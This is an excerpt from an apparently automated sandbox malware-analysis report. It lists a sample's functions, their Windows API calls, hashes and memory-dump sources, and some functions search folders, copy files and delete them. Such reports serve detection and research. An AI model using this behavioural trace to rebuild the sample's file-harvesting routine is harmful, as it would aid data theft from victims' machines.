                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3183270410-0
                                                                                                                                                                        • Opcode ID: da81354de6e2874130b7592a7a3ac8190e12a7915167c9259aed9dc9b47688c8
                                                                                                                                                                        • Instruction ID: d30d64643ab4c986196bc0ffe0b8568ac311b4cb8e58119368d27bd76f208594
                                                                                                                                                                        • Opcode Fuzzy Hash: da81354de6e2874130b7592a7a3ac8190e12a7915167c9259aed9dc9b47688c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF05475604208ABDB11BB68EC45FEE7BBC9B44700F00005AF645DB190DFB4D9858B95
                                                                                                                                                                        Function 00190C5A Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
                                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4203777966-0
                                                                                                                                                                        • Opcode ID: 12f71ecc2a2acdaed44453049586bb971b2495d4c767c505b4f382a2fd648728
                                                                                                                                                                        • Instruction ID: b4960d84968970b4d8d411b3ca8f477a02fbb5c2580cd6a4f14e65d7bb7fa994
                                                                                                                                                                        • Opcode Fuzzy Hash: 12f71ecc2a2acdaed44453049586bb971b2495d4c767c505b4f382a2fd648728
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E08CB1204204BBD741AB999C4DF8F7BACDB88751F000264F605D2150E7B0C9848720
                                                                                                                                                                        Function 0019CBFD Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 0019CC0E
                                                                                                                                                                          • Part of subcall function 0019BBB1: lstrlenA.KERNEL32(?,0019CC1F,0019CCC1,00000000,06400000,00000003,00000000,001975C1,.exe,001B6C64,001B6C60,001B6C5C,001B6C58,001B6C54,001B6C50,001B6C4C), ref: 0019BBE3
                                                                                                                                                                          • Part of subcall function 0019BBB1: malloc.MSVCRT ref: 0019BBEB
                                                                                                                                                                          • Part of subcall function 0019BBB1: lstrcpyA.KERNEL32(00000000,?), ref: 0019BBF6
                                                                                                                                                                        • malloc.MSVCRT ref: 0019CC4B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974738957-0
                                                                                                                                                                        • Opcode ID: 89d838119ec0f05c8d6a381d486c9670557fc990870872295c4a7ba45ce503a4
                                                                                                                                                                        • Instruction ID: 8d2a49b417d01331bd7ff0a647eaf628c46c60e746d95a56850cc756241835f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 89d838119ec0f05c8d6a381d486c9670557fc990870872295c4a7ba45ce503a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 72F0B4726092265BDF246F69ED8195BBFA8EB487A0F064121FE4D9B241DB30EC0087F0
                                                                                                                                                                        Function 001984F0 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d47c77b1794f1193cc8c4bc079dc0fb71e1deeb1ad4289a205c06f0802c0949e
                                                                                                                                                                        • Instruction ID: d9f8ac4e723aedc6912faf6ccd02ac29ee3e05dcba009e20925ae8047e6c9455
                                                                                                                                                                        • Opcode Fuzzy Hash: d47c77b1794f1193cc8c4bc079dc0fb71e1deeb1ad4289a205c06f0802c0949e
                                                                                                                                                                        • Instruction Fuzzy Hash: B3516272D10200BFDF717BBD8549AB8B2D9AFB2314F160446F4148A136DF658E894E61
                                                                                                                                                                        Function 00191D91 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                                        • Opcode ID: aaa370a847d3d055293ac01beeb211b4c362f460d1e8be7856986a77934a70d4
                                                                                                                                                                        • Instruction ID: 90385fb2f9cc9c2d8e6095943f3f983c0ef0ccc80080620c62b59b42f7c252b8
                                                                                                                                                                        • Opcode Fuzzy Hash: aaa370a847d3d055293ac01beeb211b4c362f460d1e8be7856986a77934a70d4
                                                                                                                                                                        • Instruction Fuzzy Hash: F6F0BD71A10159ABDB16EF68EC519AEB7FCEB48300F0045AAB905D7251DA34AF458B90
                                                                                                                                                                        Function 00192516 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHFileOperationA.SHELL32(?), ref: 0019254C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileOperation
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3080627654-0
                                                                                                                                                                        • Opcode ID: ab47765b27987e0569c70115b4a0ca648844c3f45a1fc092e764b8cc60b4a1da
                                                                                                                                                                        • Instruction ID: 0c301cd70915aaa36bc3da8e5640e281ef6b934160a4b14bf600c173c7dfb55e
                                                                                                                                                                        • Opcode Fuzzy Hash: ab47765b27987e0569c70115b4a0ca648844c3f45a1fc092e764b8cc60b4a1da
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE075B0D0420D9FCB44EFA9DA452DEBBF4AB18308F004169C115F2240E3B482458BA5
                                                                                                                                                                        Function 0019C372 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                        • Opcode ID: 802f3fefc47a25a5f42da4a5c7361ad6c6daf9ad106be494594426d9b3157711
                                                                                                                                                                        • Instruction ID: a8508a59ff43476860c844ac7c5ec8de1f9a66a45ca537056336b7782a064cad
                                                                                                                                                                        • Opcode Fuzzy Hash: 802f3fefc47a25a5f42da4a5c7361ad6c6daf9ad106be494594426d9b3157711
                                                                                                                                                                        • Instruction Fuzzy Hash: FB214870200710CFC720DF6ED084956B7F4FF58324B55486DE68A8B722C772E880CB42

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00194D08 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfA.USER32 ref: 00194D5C
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00194D73
                                                                                                                                                                        • _memset.LIBCMT ref: 00194D8F
                                                                                                                                                                        • _memset.LIBCMT ref: 00194DA0
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6A00), ref: 00194DC1
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6A04), ref: 00194DDB
                                                                                                                                                                        • wsprintfA.USER32 ref: 00194E02
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B660F), ref: 00194E16
                                                                                                                                                                        • wsprintfA.USER32 ref: 00194E3F
                                                                                                                                                                        • wsprintfA.USER32 ref: 00194E56
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • _memset.LIBCMT ref: 00194E68
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00194E7D
                                                                                                                                                                        • strtok_s.MSVCRT ref: 00194EC2
                                                                                                                                                                        • _memset.LIBCMT ref: 00194ED4
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00194EE9
                                                                                                                                                                        • strtok_s.MSVCRT ref: 00194F02
                                                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00194F17
                                                                                                                                                                        • DeleteFileA.KERNEL32(?,001B6A30,001B661D), ref: 00194FD0
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 00194FE0
                                                                                                                                                                          • Part of subcall function 0019213B: CreateFileA.KERNEL32(00194FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00194FEC,?), ref: 00192156
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00194FF6
                                                                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00195001
                                                                                                                                                                        • strtok_s.MSVCRT ref: 00195027
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00195145
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00195165
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
